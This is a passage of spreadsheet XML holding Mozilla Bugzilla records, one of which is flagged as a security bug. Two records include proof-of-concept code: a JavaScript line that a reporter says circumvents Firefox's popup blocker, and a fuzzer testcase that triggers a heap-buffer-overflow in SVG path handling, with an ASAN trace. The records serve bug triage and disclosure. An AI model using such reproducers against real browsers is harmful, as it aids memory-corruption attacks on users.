      <c r="B1540" t="inlineStr">
        <is>
          <t>2009-11-12 14:21:28 -0800</t>
        </is>
      </c>
      <c r="C1540" t="inlineStr">
        <is>
          <t>404 error when using interactive translator on mobile.support.m.c</t>
        </is>
      </c>
      <c r="D1540" t="inlineStr">
        <is>
          <t>2009-12-10 11:08:17 -0800</t>
        </is>
      </c>
      <c r="E1540" t="n">
        <v>1</v>
      </c>
      <c r="F1540" t="n">
        <v>1</v>
      </c>
      <c r="G1540" t="n">
        <v>5</v>
      </c>
      <c r="H1540" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1540" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1540" t="inlineStr">
        <is>
          <t>Mobile</t>
        </is>
      </c>
      <c r="K1540" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1540" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1540" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1540" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1540" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1540" t="inlineStr"/>
      <c r="Q1540" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1540" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1540" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1540" t="n">
        <v>1</v>
      </c>
      <c r="U1540" t="n">
        <v>0</v>
      </c>
      <c r="V1540" t="n">
        <v>3</v>
      </c>
      <c r="W1540" t="inlineStr">
        <is>
          <t>Attachment 399900 from bug 515826 didn't get applied to the Fennec branch, so localizers are seeing the same issue there.</t>
        </is>
      </c>
      <c r="X1540" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1541">
      <c r="A1541" t="n">
        <v>790373</v>
      </c>
      <c r="B1541" t="inlineStr">
        <is>
          <t>2012-09-11 12:40:18 -0700</t>
        </is>
      </c>
      <c r="C1541" t="inlineStr">
        <is>
          <t>plugin scroll position listener callback may destroy listener list (crash of bug 788436)</t>
        </is>
      </c>
      <c r="D1541" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1541" t="n">
        <v>1</v>
      </c>
      <c r="F1541" t="n">
        <v>1</v>
      </c>
      <c r="G1541" t="n">
        <v>6</v>
      </c>
      <c r="H1541" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1541" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1541" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1541" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1541" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1541" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1541" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1541" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1541" t="inlineStr">
        <is>
          <t>to be fixed by bug 598397 [adv-main19+]</t>
        </is>
      </c>
      <c r="Q1541" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1541" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1541" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1541" t="n">
        <v>1</v>
      </c>
      <c r="U1541" t="n">
        <v>0</v>
      </c>
      <c r="V1541" t="n">
        <v>14</v>
      </c>
      <c r="W1541" t="inlineStr">
        <is>
          <t>smaug noticed that the crash in bug 788436 could be caused because while we are iterating over the list of scroll position listeners in nsGfxScrollFrameInner::ScrollToImpl the nsPluginInstanceOwner::ScrollPositionWillChange call could easily end up in plugin code that could potentially do anything, including change the list of scroll position listeners and cause the crash.
Filing this non-public bug so we can discuss this potential security problem.</t>
        </is>
      </c>
      <c r="X1541" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1542">
      <c r="A1542" t="n">
        <v>127321</v>
      </c>
      <c r="B1542" t="inlineStr">
        <is>
          <t>2002-02-22 13:48:30 -0800</t>
        </is>
      </c>
      <c r="C1542" t="inlineStr">
        <is>
          <t>option-right-arrow moving between words stops at punctuation</t>
        </is>
      </c>
      <c r="D1542" t="inlineStr">
        <is>
          <t>2003-02-20 18:57:28 -0800</t>
        </is>
      </c>
      <c r="E1542" t="n">
        <v>1</v>
      </c>
      <c r="F1542" t="n">
        <v>1</v>
      </c>
      <c r="G1542" t="n">
        <v>3</v>
      </c>
      <c r="H1542" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1542" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1542" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1542" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1542" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1542" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1542" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1542" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1542" t="inlineStr">
        <is>
          <t>EDITORBASE+</t>
        </is>
      </c>
      <c r="Q1542" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1542" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1542" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T1542" t="n">
        <v>1</v>
      </c>
      <c r="U1542" t="n">
        <v>2</v>
      </c>
      <c r="V1542" t="n">
        <v>32</v>
      </c>
      <c r="W1542" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh; U; PPC; en-US; rv:0.9.8) Gecko/20020204
BuildID:    2002020405
if you use option-right-arrow to move from word to word in
the compose window (HTML compose) you get 'stuck' at punctuation
marks. The cursor won't go any further. using option-left-arrow seems
to work ok.
Reproducible: Always
Steps to Reproduce:
1.compose and HTML mail
2.use option--right-arrow to move around
3.</t>
        </is>
      </c>
      <c r="X1542" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1543">
      <c r="A1543" t="n">
        <v>1411115</v>
      </c>
      <c r="B1543" t="inlineStr">
        <is>
          <t>2017-10-23 18:53:41 -0700</t>
        </is>
      </c>
      <c r="C1543" t="inlineStr">
        <is>
          <t>F_SETLK fcntl used by Nvidia GL drivers and sometimes fontconfig</t>
        </is>
      </c>
      <c r="D1543" t="inlineStr">
        <is>
          <t>2017-11-01 19:38:51 -0700</t>
        </is>
      </c>
      <c r="E1543" t="n">
        <v>1</v>
      </c>
      <c r="F1543" t="n">
        <v>1</v>
      </c>
      <c r="G1543" t="n">
        <v>3</v>
      </c>
      <c r="H1543" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1543" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1543" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K1543" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L1543" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1543" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1543" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1543" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1543" t="inlineStr">
        <is>
          <t>sb+</t>
        </is>
      </c>
      <c r="Q1543" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1543" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1543" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T1543" t="n">
        <v>1</v>
      </c>
      <c r="U1543" t="n">
        <v>0</v>
      </c>
      <c r="V1543" t="n">
        <v>9</v>
      </c>
      <c r="W1543" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-977d65d7-a4c4-40b9-937b-328e00171023.
=============================================================
I'm using Linux Mint on a x86_64 system. I have NVidia graphics.
I'm noticing a crash in nightly whenever I open facebook.com or reddit.com.  The tab crashes everytime, without fail.  The crash reports seem to come from a thread executing within libc-2.23.so/libnvidia-glcore.so.375.66 updating my nvidia drivers didn't stop the crash.
This happens for multiple versions of nightly for a few days now.  It happens on my main profile but not a new "test" profile with the same plugins installed.
It does not happen on my laptop (without NVidia graphics) although the laptop also has a different profile.
How can I narrow down the differences between the main profile and the new test profile further.  Other than addons?  Where are good places to look?
Thanks.</t>
        </is>
      </c>
      <c r="X1543" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1544">
      <c r="A1544" t="n">
        <v>294799</v>
      </c>
      <c r="B1544" t="inlineStr">
        <is>
          <t>2005-05-19 08:20:02 -0700</t>
        </is>
      </c>
      <c r="C1544" t="inlineStr">
        <is>
          <t>Any_XPCOM_Object.anyFunction.__proto__.__parent__ refers to the invisible blank ChromeWindow</t>
        </is>
      </c>
      <c r="D1544" t="inlineStr">
        <is>
          <t>2007-04-01 15:05:10 -0700</t>
        </is>
      </c>
      <c r="E1544" t="n">
        <v>1</v>
      </c>
      <c r="F1544" t="n">
        <v>1</v>
      </c>
      <c r="G1544" t="n">
        <v>3</v>
      </c>
      <c r="H1544" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1544" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1544" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1544" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1544" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1544" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1544" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1544" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1544" t="inlineStr">
        <is>
          <t>[sg:fix] -fixed by 294795. Bug details embargoed until August 1, 2005</t>
        </is>
      </c>
      <c r="Q1544" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1544" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1544" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1544" t="n">
        <v>1</v>
      </c>
      <c r="U1544" t="n">
        <v>0</v>
      </c>
      <c r="V1544" t="n">
        <v>10</v>
      </c>
      <c r="W1544" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Any_XPCOM_Object.anyFunction.__proto__.__parent__ refers to the invisible blank
ChromeWindow. It is [object ChromeWindow], but its location is "about:blank".
thus, it does *not* have chrome privilege.
There is a exception:
document.open.__proto__.__parent__ refers to document.defaultView
I'm not sure what an attacker can do. but, at least this bug can be used in
order to circumvent the built-in popup blocker.
  window.alert.__proto__.__parent__.location =
    "javascript:window.open('http://www.mozilla.org/')";
Affected:
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518 Firefox/1.0+
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518
(Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Thunderbird/1.0.2
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050518 Thunderbird/1.0.4
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518 Thunderbird/1.0+
Note for Thunderbird:
Content script cannot change ChromeWindow.location and cannot call
ChromeWindow.open()
Note:
Firefox and Thunderbird have critical issue that is similar to this bug.
see Bug 294795.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X1544" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1545">
      <c r="A1545" t="n">
        <v>1430557</v>
      </c>
      <c r="B1545" t="inlineStr">
        <is>
          <t>2018-01-15 03:30:09 -0800</t>
        </is>
      </c>
      <c r="C1545" t="inlineStr">
        <is>
          <t>heap-buffer-overflow in DOMSVGPathSegCurvetoCubicAbs</t>
        </is>
      </c>
      <c r="D1545" t="inlineStr">
        <is>
          <t>2024-05-30 09:41:49 -0700</t>
        </is>
      </c>
      <c r="E1545" t="n">
        <v>1</v>
      </c>
      <c r="F1545" t="n">
        <v>1</v>
      </c>
      <c r="G1545" t="n">
        <v>3</v>
      </c>
      <c r="H1545" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1545" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1545" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K1545" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L1545" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1545" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1545" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1545" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1545" t="inlineStr">
        <is>
          <t>[fixed in Nightly by bug 1436438][post-critsmash-triage][adv-main59+][adv-esr52.7+]</t>
        </is>
      </c>
      <c r="Q1545" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1545" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1545" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T1545" t="n">
        <v>1</v>
      </c>
      <c r="U1545" t="n">
        <v>0</v>
      </c>
      <c r="V1545" t="n">
        <v>32</v>
      </c>
      <c r="W1545" t="inlineStr">
        <is>
          <t>Created attachment 8942631
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=21ddfb9e6cc008e47da89db50e22697dc7b38635).
&lt;script&gt;
        o1035=document.createElementNS('http://www.w3.org/2000/svg','path');
        o1035.setAttribute('d','M 19 786434 C 7077888 11, 18 98304, 10 94208 z');
        o1161=o1035.animatedPathSegList;
        o1189=o1035.createSVGPathSegLinetoVerticalRel(1);
        o1398=o1161.getItem(1);
        o1768=o1035.pathSegList;
        o1768.replaceItem(o1189,1);
        o1768.insertItemBefore(o1189,1);
        o1768.appendItem(o1398);
&lt;/script&gt;
ASAN output:
=================================================================
==29577==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000283af4 at pc 0x0000004bdf99 bp 0x7ffd6aace280 sp 0x7ffd6aacda30
READ of size 24 at 0x606000283af4 thread T0 (file:// Content)
    #0 0x4bdf98 in __asan_memcpy /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3
    #1 0x7fa50b44eb55 in DOMSVGPathSegCurvetoCubicAbs /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSeg.h:363:3
    #2 0x7fa50b44eb55 in mozilla::DOMSVGPathSegCurvetoCubicAbs::Clone() /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSeg.h:363
    #3 0x7fa50b42d4de in mozilla::DOMSVGPathSegList::InsertItemBefore(mozilla::DOMSVGPathSeg&amp;, unsigned int, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:372:24
    #4 0x7fa508e5fc9a in AppendItem /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.h:160:12
    #5 0x7fa508e5fc9a in mozilla::dom::SVGPathSegListBinding::appendItem(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::DOMSVGPathSegList*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/SVGPathSegListBinding.cpp:348
    #6 0x7fa509f594f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
    #7 0x7fa510992d24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #8 0x7fa510992d24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #9 0x7fa51097dd56 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #10 0x7fa51097dd56 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #11 0x7fa510964700 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #12 0x7fa510995cc1 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:706:15
    #13 0x7fa51099645f in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:738:12
    #14 0x7fa51148f1e6 in ExecuteScript(JSContext*, JS::AutoObjectVector&amp;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/worker/workspace/build/src/js/src/jsapi.cpp:4712:12
    #15 0x7fa508077846 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JSScript*&gt;) /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:266:8
    #16 0x7fa50be7caad in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2268:25
    #17 0x7fa50be76d39 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1911:10
    #18 0x7fa50be740a3 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1555:10
    #19 0x7fa50be589fe in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1293:10
    #20 0x7fa50be57b19 in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:147:18
    #21 0x7fa506e9a84b in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:246:18
    #22 0x7fa506e9a84b in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:736
    #23 0x7fa506e93ab4 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:540:7
    #24 0x7fa506ea013b in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:131:20
    #25 0x7fa504dce710 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:395:25
    #26 0x7fa504df670d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #27 0x7fa504e114e0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #28 0x7fa505c9c63a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #29 0x7fa505bf3f29 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #30 0x7fa505bf3f29 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #31 0x7fa505bf3f29 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #32 0x7fa50c0092ea in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #33 0x7fa5106bc1cb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:874:22
    #34 0x7fa505bf3f29 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #35 0x7fa505bf3f29 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #36 0x7fa505bf3f29 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #37 0x7fa5106bbbb1 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:700:34
    #38 0x4ee915 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #39 0x4ee915 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #40 0x7fa523c1482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #41 0x41dfe8 in _start (/fuzzer3/firefox/firefox+0x41dfe8)
0x606000283af4 is located 0 bytes to the right of 52-byte region [0x606000283ac0,0x606000283af4)
allocated by thread T0 (file:// Content) here:
    #0 0x4bed33 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7fa504d623c8 in Malloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:196:46
    #2 0x7fa504d623c8 in nsTArrayFallibleAllocator::ResultTypeProxy nsTArray_base&lt;nsTArrayFallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity&lt;nsTArrayFallibleAllocator&gt;(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:136
    #3 0x7fa50938b2c7 in float* nsTArray_Impl&lt;float, nsTArrayFallibleAllocator&gt;::ReplaceElementsAt&lt;float, nsTArrayFallibleAllocator&gt;(unsigned long, unsigned long, float const*, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2025:47
    #4 0x7fa50b4c0c43 in Assign&lt;nsTArrayFallibleAllocator, nsTArrayFallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1252:9
    #5 0x7fa50b4c0c43 in Assign&lt;nsTArrayFallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1261
    #6 0x7fa50b4c0c43 in mozilla::SVGPathData::CopyFrom(mozilla::SVGPathData const&amp;) /builds/worker/workspace/build/src/dom/svg/SVGPathData.cpp:37
    #7 0x7fa50b45d9ed in mozilla::SVGAnimatedPathSegList::SetBaseValueString(nsTSubstring&lt;char16_t&gt; const&amp;) /builds/worker/workspace/build/src/dom/svg/SVGAnimatedPathSegList.cpp:57:27
    #8 0x7fa50b52b296 in nsSVGElement::ParseAttribute(int, nsAtom*, nsTSubstring&lt;char16_t&gt; const&amp;, nsIPrincipal*, nsAttrValue&amp;) /builds/worker/workspace/build/src/dom/svg/nsSVGElement.cpp:422:20
    #9 0x7fa507d3755c in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring&lt;char16_t&gt; const&amp;, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2608:8
    #10 0x7fa507d36950 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:894:12
    #11 0x7fa507d36950 in mozilla::dom::Element::SetAttribute(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsIPrincipal*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/Element.cpp:1348
    #12 0x7fa50997ac88 in mozilla::dom::ElementBinding::setAttribute(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:1167:9
    #13 0x7fa509f594f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
    #14 0x7fa510992d24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #15 0x7fa510992d24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #16 0x7fa51097dd56 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #17 0x7fa51097dd56 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #18 0x7fa510964700 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #19 0x7fa510995cc1 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:706:15
    #20 0x7fa51099645f in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:738:12
    #21 0x7fa51148f1e6 in ExecuteScript(JSContext*, JS::AutoObjectVector&amp;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/worker/workspace/build/src/js/src/jsapi.cpp:4712:12
    #22 0x7fa508077846 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JSScript*&gt;) /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:266:8
    #23 0x7fa50be7caad in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2268:25
    #24 0x7fa50be76d39 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1911:10
    #25 0x7fa50be740a3 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1555:10
    #26 0x7fa50be589fe in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1293:10
    #27 0x7fa50be57b19 in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:147:18
    #28 0x7fa506e9a84b in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:246:18
    #29 0x7fa506e9a84b in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:736
    #30 0x7fa506e93ab4 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:540:7
    #31 0x7fa506ea013b in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:131:20
    #32 0x7fa504dce710 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:395:25
    #33 0x7fa504df670d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #34 0x7fa504e114e0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #35 0x7fa505c9c63a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #36 0x7fa505bf3f29 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #37 0x7fa505bf3f29 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #38 0x7fa505bf3f29 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
